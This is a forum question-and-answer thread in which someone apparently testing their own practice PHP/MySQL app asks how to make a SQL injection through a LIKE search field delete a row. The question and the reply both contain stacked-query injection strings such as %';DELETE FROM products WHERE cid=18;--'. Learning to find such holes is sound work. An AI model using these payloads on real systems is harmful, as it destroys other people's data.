How do I make SQL injection is this vulnerable query

Question

I have this query that receives a parameter from user input and I think that I am vulnerable to SQL injection.

$query = "SELECT pcode,price,description
FROM products 
WHERE description like '%" . $search_criteria . "%' ORDER BY PRICE ";

To test it to see if the if it's really vulnerable I am trying to send the following input

%';DELETE FROM products WHERE cid=18;#

so that the delete instruction is runned but the resultant query from this input is the following.

pcode,price,description FROM products WHERE description like '%%';DELETE FROM products WHERE cid=18#' %' ORDER BY PRICE

Although my testing parameter appears the in result SQL, the rest of the SQL ( "%' ORDER BY PRICE) wasn't ignored by the #.

What adjustments do I need to make so that my input deletes the testing row?

Output

SQL Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DELETE FROM products WHERE cid=17;-- %' ORDER BY PRICE' at line 1
SQL Statement:SELECT pcode,price,description FROM products WHERE description like '%%';DELETE FROM products WHERE cid=17;-- %' ORDER BY PRICE
Did you run setupreset.php to setup/reset the DB?

How the backend executes the query

$query = "SELECT pcode,price,description FROM products WHERE description like '%" . $search_criteria . "%' ORDER BY PRICE ";
$result = execute_query($query);

Answer 1

which target DBMS are you trying to hack? Basically you can use below condition as a try:

%';DELETE FROM products WHERE cid=18;--' 

see the script: https://www.db-fiddle.com/f/3jC8PGeZZEuty3XVq8gdzz/1